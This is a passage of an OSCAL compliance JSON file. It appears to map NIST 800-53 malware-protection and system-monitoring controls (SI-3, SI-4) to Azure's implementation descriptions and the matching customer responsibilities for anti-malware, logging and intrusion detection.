statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"767bd294-ba41-4091-8b46-a741d28f7939","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-3","statements":[{"uuid":"6fa5102e-e017-4424-a8b6-0287be54f47c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-3_smt.a","by-components":[{"uuid":"1cf36af1-b054-403e-97f3-0bba2f4b0ccd","export":{"provided":[{"uuid":"2a1a7e3e-1d0c-4339-9269-b2ec4f28bfdb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-013"}],"description":"Servers The use of anti-malware software is a principal mechanism for protection of Azure assets from malicious software. The software, deployed and managed by Azure Security Pack (AzSecPack), detects and prevents the introduction of viruses, malware, rootkits, worms, and other malicious software onto the services. Approved tools Microsoft Defender AV and ClamAV are installed as part of the initial build on all servers, including all entry and exit points to the Azure cloud. This software provides both preventive and detective control over malicious software using signature-based protection mechanisms. In addition to signature-based detection mechanisms, Defender also utilizes behavior monitoring, network inspection, and heuristics to detect malicious code that may be missed by signature-based methods. Network Devices Network devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software described above and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and comprehensive logging and monitoring."}],"responsibilities":[{"uuid":"bba4191c-154c-4eb8-81d8-97ba51389e5a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against malicious code by implementing either signature based; non-signature based; or both malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.","provided-uuid":"2a1a7e3e-1d0c-4339-9269-b2ec4f28bfdb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"abe3b1b7-f35e-4c29-991d-adc3e2d53391","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-3_smt.b","by-components":[{"uuid":"53eb133c-7edc-4907-9275-eea1dff55950","export":{"provided":[{"uuid":"1b4b2c14-2e5d-42be-9871-5c9e5619b1fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-014"}],"description":"Servers Azure updates malicious code protection mechanisms for Defender and ClamAV including signature definitions whenever new releases are available. The anti-malware software is configured to check for updates to the signature files at least daily and automatically update the signatures accordingly. Network Devices Network devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software described above and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and comprehensive logging and monitoring."}],"responsibilities":[{"uuid":"2ab4f880-597e-44dc-bfa7-8c3c836abc1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for automatically updating malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.","provided-uuid":"1b4b2c14-2e5d-42be-9871-5c9e5619b1fd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0b2e4ceb-2b32-4224-b0df-ca727fe335ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-016"}],"statement-id":"si-3_smt.c","by-components":[{"uuid":"adb92fb0-540b-4908-a009-a5f46b3dcd82","export":{"provided":[{"uuid":"f459dd33-cd51-4d3e-8d57-d5941893681d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-015"}],"description":"Servers Defender and ClamAV are centrally managed via Azure Security Pack (AzSecPack). On each endpoint for each service team, the anti-malware software performs: * periodic scans at least weekly and * real-time scans of files as they are downloaded, opened, or executed. Network Devices Network devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and in-depth logging and monitoring."},{"uuid":"6af5def5-bb54-4016-b321-4433607a5a6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-016"}],"description":"Servers When Defender detects malware, it attempts to block the malware and an alert is generated and sent to Azure service teams, Azure Security, and/or C+AI Security, depending on the severity of the malware and the outcome of Defender-initiated actions. When ClamAV detects malware, it does not auto-remediate the malware. Instead, Microsoft Threat Intelligence Center (MSTIC) detections are used to analyze commands generated as part of process activity to look for anomalous activity. The anti-malware protection software ClamAV for Linux servers is currently not configured with on-access scanning enabled. As such, real-time scanning and protections for Linux services are not provided. To mitigate against the risk of enabling malicious files to be permitted to be copied or installed on Linux servers and remain there until found by the weekly scans, Azure has implemented strong access management controls, traffic flow restrictions, and system-level monitoring that are in place for all Azure servers including Linux. Response to anti-malware detections are handled by a combination of the service teams for those detections that autoroute to the service owners and the Microsoft Security Response Center (MSRC) working in the Cyber Defense Operating Center (CDOC) who reviews detections for anomalous activity. The receiving personnel initiate the incident management process as applicable. For successfully blocked malware, no additional action is needed. Incidents, including false positives, are tracked and resolved, and post-mortem analysis is performed on incidents where it is determined necessary. Customers including government customers and US-CERT are notified by the incident management processes if required. Network Devices Network devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software and the secure coding practices required by the Security Development Lifecycle (SDL), configuration management and control, supply chain processes, and in-depth logging and monitoring."}],"responsibilities":[{"uuid":"71875f0d-f42a-4195-9e88-d72dea0b6df9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against malicious code by configuring mechanisms to perform periodic scans of the system at a customer-defined frequency and perform real-time scans of files from external sources at endpoint and/or network entry/exit points as the files are downloaded, opened, or executed in accordance with organizational security policy.","provided-uuid":"f459dd33-cd51-4d3e-8d57-d5941893681d"},{"uuid":"adceb717-e31e-490d-b799-f879ceba9a7c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-016"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for one or more of blocking malicious code; quarantining malicious code; or taking an organization-defined action; and sending alerts to organization-defined personnel or roles in response to malicious code detection.","provided-uuid":"6af5def5-bb54-4016-b321-4433607a5a6a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1f36dbc6-7155-4c9d-8e02-804acd76e9f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-3_smt.d","by-components":[{"uuid":"443eff55-4b54-40c9-9d59-1e1449bbf406","export":{"provided":[{"uuid":"2f629fe6-3148-4bdf-bc10-8bc43651953c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-017"}],"description":"Servers By default, Defender quarantines malicious code identified from the anti-malware software and does not immediately delete it for the Windows operating system. Falsely identified malicious code is put in a quarantined folder on the system. Azure can roll back quarantined files if they are falsely determined to be malicious code to resolve impact to operations in the system. For Linux operating systems, Azure uses ClamAV to identify the characteristics and behavior of malicious code. ClamAV does not auto-remediate the malware. Instead, Microsoft Threat Intelligence Center (MSTIC) detections are used to analyze commands generated as part of process activity to look for anomalous activity. Response to anti-malware detections are handled by a combination of the service teams for those detections that autoroute to the service owners and the Microsoft Security Response Center (MSRC) working in the Cyber Defense Operating Center (CDOC) who reviews detections for anomalous activity. Network Devices Network devices do not natively support anti-malware software, but are protected through a combination of the server-based anti-malware software and the secure coding practices required by the Security Development Lifecycle, configuration management and control, supply chain processes, and in-depth logging and monitoring."}],"responsibilities":[{"uuid":"17e86dd5-2d5c-49f1-8b50-cc648e00cd0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-017"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for addressing the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.","provided-uuid":"2f629fe6-3148-4bdf-bc10-8bc43651953c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1e203710-8b9a-4084-ac2f-db7f6a88c97d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4","statements":[{"uuid":"d8edb828-ae39-4a22-8a0d-1004b21abf0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-019"}],"statement-id":"si-4_smt.a","by-components":[{"uuid":"1b47cffd-a697-40f3-8f8a-9e192ed84ce0","export":{"provided":[{"uuid":"912fc4bf-8ba5-4f8e-be1f-75ea0b8123bf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-018"}],"description":"Azure requires service teams to deploy active monitoring solutions that generate audit logs and alerts as a required step in the Security Development Lifecycle (SDL) process, described in the CM family of controls. All service teams upload their logs to Geneva Monitoring, where they are aggregated and processed as described in the AU family of controls. The Logging and Monitoring team assists in identifying normal usage of the system and deviations from that normal range. The tooling automatically reviews audit logs and antivirus and anti-malware information to confirm that the system is functioning in an optimal, resilient, and secure state and identifies irregularities or anomalies that are indicators of a system malfunction or compromise. Unusual activity is flagged for further review via detections and alerts. Any log event that indicates a potential violation of the Microsoft Security Policy (MSP) is immediately brought to the attention of Azure Security. In addition, the implemented host-based SDN firewall uses a deny all policy."},{"uuid":"7d0b7a89-f79c-4f20-806d-4677f42946f3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-019"}],"description":"Local connections are disallowed by policy within Azure. No personnel have local access. Azure performs network monitoring and detection of unauthorized connections via Network Isolation (NetIso), which provides the Network Risk Management Service (NRMS) for network baseline measurement, management, and enforcement. The service provides an assessment of network security and alerts on internet-exposed endpoints via Incident Management (IcM) based on analysis patterns for configuration issues. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host to ensure detection of network services that have not been authorized as an indicator of compromise."}],"responsibilities":[{"uuid":"e64ab2a1-6b93-4471-aaac-7a925b988549","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-018"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources to detect: attacks and indicators of potential attacks in accordance with customer-defined monitoring objectives.","provided-uuid":"912fc4bf-8ba5-4f8e-be1f-75ea0b8123bf"},{"uuid":"d72c4699-6288-4784-bc79-81123f052a8f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-019"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources to detect: unauthorized local, network, and remote connections.","provided-uuid":"7d0b7a89-f79c-4f20-806d-4677f42946f3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e9bf9004-d789-455f-94b3-fca2e22c7f68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.b","by-components":[{"uuid":"fb1d5646-35f9-4c0a-ad8e-c61fd7d504dc","export":{"provided":[{"uuid":"299af419-6101-4b14-952e-4830641c2b19","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-020"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes event forwarding and monitoring tools to record events across Azure and correlate the events gathered by each logging tool. Log review cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure Security Monitoring (ASM) and Scuba are used to do direct alerting using IcM tickets on security-relevant events. These tools utilize event audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams, as appropriate. The policies are tuned to alert on events of immediate concern. Events that need little or no correlation to prompt a preliminary investigation and attention of Security Response Team personnel. Once processed, the Security Response Team reviews and analyzes alerts generated by the automated review of audit records in real time, specifically in the case of a security incident, customer request or escalation, or any other functionality impacting the incident in production. Groups of these correlated events that meet a pattern of a known attack methodology are collected and delivered to personnel via IcM or email. Personnel correlate alerts, collect multiple similar alarms, and append them to tickets for review and analysis. The alerting system provides response capability twenty-four (24) hours a day, seven (7) days a week. Troubleshooting Guides (TSGs) applied to workflow tickets provide instructions for the escalation of certain events to response personnel."}],"responsibilities":[{"uuid":"cb48b1b8-e69d-43c0-b613-7af472d770bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-020"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources to identify unauthorized use through customer-defined techniques and methods.","provided-uuid":"299af419-6101-4b14-952e-4830641c2b19"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ab1a226f-ce60-4f64-b713-d223fb2a2d00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-022"}],"statement-id":"si-4_smt.c","by-components":[{"uuid":"9f0cb532-af8c-45e3-be26-b043c3b032e5","export":{"provided":[{"uuid":"1e299232-79fb-4b34-b00a-e3befae43e7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-021"}],"description":"All assets act as monitoring devices and are configured to log all security-relevant events. Suspicious events generate alerts and notifications to service team staff and incident management staff as needed. Azure assets are configured to upload their logs to a central repository managed by C+AI Security. These logs are aggregated and reports are generated by the Security Response Team. Because of the extensive centralized management of all audit logs, Azure has determined that there is no need for ad-hoc deployment of monitoring devices."},{"uuid":"caa86cdf-4fa7-4994-beb0-75e67ced0ff7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-022"}],"description":"All assets act as monitoring devices and are configured to log all security-relevant events. Suspicious events generate alerts and notifications to service team staff and incident management staff as needed. Azure assets are configured to upload their logs to a central repository managed by C+AI Security. These logs are aggregated and reports are generated by the Security Response Team. Because of the extensive centralized management of all audit logs, Azure has determined that there is no need for ad-hoc deployment of monitoring devices."}],"responsibilities":[{"uuid":"1aeb5811-b14a-48a8-8e28-971bc279d1e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-021"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for configuring monitoring devices for customer-deployed resources strategically to collect customer-defined essential information, and at ad hoc locations to track specific types of transactions of interest to the organization.","provided-uuid":"1e299232-79fb-4b34-b00a-e3befae43e7d"},{"uuid":"2827f7b7-b27f-4c8a-9fd7-b6356458a8f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-022"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for configuring monitoring devices at ad hoc locations to track specific types of transactions of interest to the organization.","provided-uuid":"caa86cdf-4fa7-4994-beb0-75e67ced0ff7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dad67e8a-001b-49f9-bffa-1cf9f86d99d8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.d","by-components":[{"uuid":"7be370e5-98f5-4643-b99b-dbd0c2f386bd","export":{"provided":[{"uuid":"fd3033de-11d0-430e-8996-175311492020","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-023"}],"description":"Only service team personnel for the specific asset within Azure have access to security logs on the local asset via the role-based access control (RBAC) implemented via OneIdentity. Azure implements protection of audit information using an authenticated and encrypted connection from the local asset of log generation to the centralized audit collection systems using the Geneva Monitoring Agent (MA). Access to the centralized audit collection systems and storage is restricted to the Security Engineering and Operations groups based on the standard access groups defined for Azure. Only authorized service team personnel are allowed access to the actual audit records, and their assigned rights prohibit them from modifying or deleting audit information. Even if a user is able to clear local asset log data after elevating permissions via an approved JIT request, the action of cleaning the data is logged, and the cleared log data is present on Geneva Monitoring storage due to central ingestion. The following mechanisms are used to protect log information in transit and at rest: * Logs on the local asset can only be accessed through direct login to the asset. * The transfer of logs from the local asset to the service team and central storage accounts occurs over an HTTPS connection. * Read-only access to logs in Geneva Monitoring storage for Azure users is enabled through the Geneva Monitoring front-end portal. The access is restricted through AD security groups which are managed through OneIdentity."}],"responsibilities":[{"uuid":"7915f8f3-a95f-43c1-86c1-ed658bed8687","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-023"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources and analyze detected events and anomalies","provided-uuid":"fd3033de-11d0-430e-8996-175311492020"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"00104290-3810-4b0a-803d-077a297bc328","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.e","by-components":[{"uuid":"a77f984e-36c3-41e0-88c6-5df4aa95628b","export":{"provided":[{"uuid":"b037db9b-ac40-437c-a2f4-6868ccfa9ba2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-024"}],"description":"Azure Security notifies service teams if a change in the level of monitoring is necessary due to indications of increased risk, and service teams adjust monitoring accordingly. Additionally, tooling heuristics are tailored to look for specific threats based on the nature of the risk to Azure operations and assets."}],"responsibilities":[{"uuid":"63ad6eda-b1a9-4cf8-8e7b-14096d49fa75","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-024"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for adjusting monitoring activity whenever there is an indication of increased risk to customer operations, assets, and individuals; other organizations; or the Nation based on law enforcement information; intelligence information, or other credible sources of information.","provided-uuid":"b037db9b-ac40-437c-a2f4-6868ccfa9ba2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6f3cce8f-d3cb-4f41-8090-77e5738f07b9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.f","by-components":[{"uuid":"0f94c2e4-78b1-4245-81ab-db9b2e149c52","export":{"provided":[{"uuid":"37e15410-f3ca-4831-8c75-a6d9379fdaee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-025"}],"description":"Azure Security and the Security Response Team, in consultation with Corporate, External, and Legal Affairs (CELA), defines a set of log events and alerts that meet regulatory requirements for incident management and investigation. This structure is intended to support identification of known suspicious activity and to support the investigation of misuse and abuse of Azure services. To comply fully with applicable regulations, Azure service teams follow defined requirements for event collection and notification processes."}],"responsibilities":[{"uuid":"a4ed6c45-f5ef-4960-8cc5-326413d98f99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-025"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining legal opinion with regard to system monitoring activities in accordance with applicable federal laws, Executive Orders, directives, policies, or regulations.","provided-uuid":"37e15410-f3ca-4831-8c75-a6d9379fdaee"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2ba9842f-7044-4c17-9428-fea87d41ab1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4_smt.g","by-components":[{"uuid":"6593c959-1424-4f1b-9e0c-b590fd687914","export":{"provided":[{"uuid":"aee1e997-a82c-494b-9b5c-e704cc2b236a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-026"}],"description":"All services upload logs to Geneva Monitoring for aggregation and analysis. Alerts are generated from this data by Azure Security and C+AI Security. This data is available as needed."}],"responsibilities":[{"uuid":"244bc072-b577-467e-af20-44a896804a03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-026"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing selected monitoring information to customer-defined personnel/roles as needed and/or at the required frequency.","provided-uuid":"aee1e997-a82c-494b-9b5c-e704cc2b236a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7dee4316-3984-46ad-9700-f930b1ccc934","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.1","statements":[{"uuid":"800ecafb-eb59-49a5-ad75-f04466c5beb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.1_smt","by-components":[{"uuid":"c9277364-3165-4843-af78-c611adbfa8df","export":{"provided":[{"uuid":"4883f87a-f3db-4a34-a964-38b39cfbea55","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-027"}],"description":"Azure assets upload logs to a central repository managed by C+AI Security. Azure Security and the Security Response Team generate consolidated reports from this data, providing system-wide intrusion detections. Additionally, a combination of detection via the logging and monitoring pipeline and alerting infrastructure and fast response address the risk of intrusion. This includes the use of event forwarding tools, security incident and event management tools, vulnerability scanning and reporting tools, and anti-malware systems. These systems feed into central monitoring which alerts the Security Response Team for any events that need further investigation for central investigation or the service teams directly for alerts that are autorouted based on metadata available in Service Tree._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cc399290-c613-46b5-ad11-ebf41d30a1c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-027"}],"description":"The customer is responsible for monitoring customer-deployed resources, including the connection and configuration of individual intrusion detection tools, into a system-wide intrusion detection system.","provided-uuid":"4883f87a-f3db-4a34-a964-38b39cfbea55"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"83e437f1-8a13-497e-8062-6e1074d26982","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.2","statements":[{"uuid":"03cf481b-692e-404b-815d-7feed3ebe144","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.2_smt","by-components":[{"uuid":"31dad06e-775f-4793-8fb8-5c347b16bec2","export":{"provided":[{"uuid":"a4b02b97-e749-4611-95db-2420334dfdb9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-028"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes event forwarding and monitoring tools to record events across Azure and correlate the events gathered by each logging tool. Log review cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure Security Monitoring (ASM) and Scuba are used to do direct alerting using Incident Management (IcM) tickets on security-relevant events. These tools utilize event audit policies and detections that report events to the Microsoft Operations Center (MOC) and service teams, as appropriate. The policies are tuned to alert on events of immediate concern. Events that need little or no correlation to prompt a preliminary investigation and attention of Security Response Team personnel._x000D_ _x000D_ Once processed, the Security Response Team reviews and analyzes alerts generated by the automated review of audit records in real time, specifically in the case of a security incident, customer request or escalation, or any other functionality impacting the incident in production. Groups of these correlated events that meet a pattern of a known attack methodology are collected and delivered to personnel via IcM or email. Personnel correlate alerts, collect multiple similar alarms, and append them to tickets for review and analysis. The alerting system provides response capability twenty-four (24) hours a day, seven (7) days a week. Troubleshooting Guides (TSGs) applied to workflow tickets provide instructions for the escalation of certain events to response personnel._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cb873557-2c2b-4ebd-9051-9ad4c0ac711e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-028"}],"description":"The customer is responsible for monitoring customer-deployed resources using automated mechanisms to support near real-time analysis of events.","provided-uuid":"a4b02b97-e749-4611-95db-2420334dfdb9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cffc97e2-b512-48e0-b69a-f57cc6757a8a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.4","statements":[{"uuid":"f81384bc-8122-4ef9-948e-89b0ba685a2e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.4_smt.a","by-components":[{"uuid":"9ed53965-49f7-453e-a8f9-f69031689dca","export":{"provided":[{"uuid":"98c74be5-379d-4d5a-a267-c21597db3edb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-029"}],"description":"Azure currently has detections in place that will alert on suspicious/malicious inbound and outbound network activities to include brute force attacks, distributed denial of service, communication with known malicious IPs, and cryptocurrency 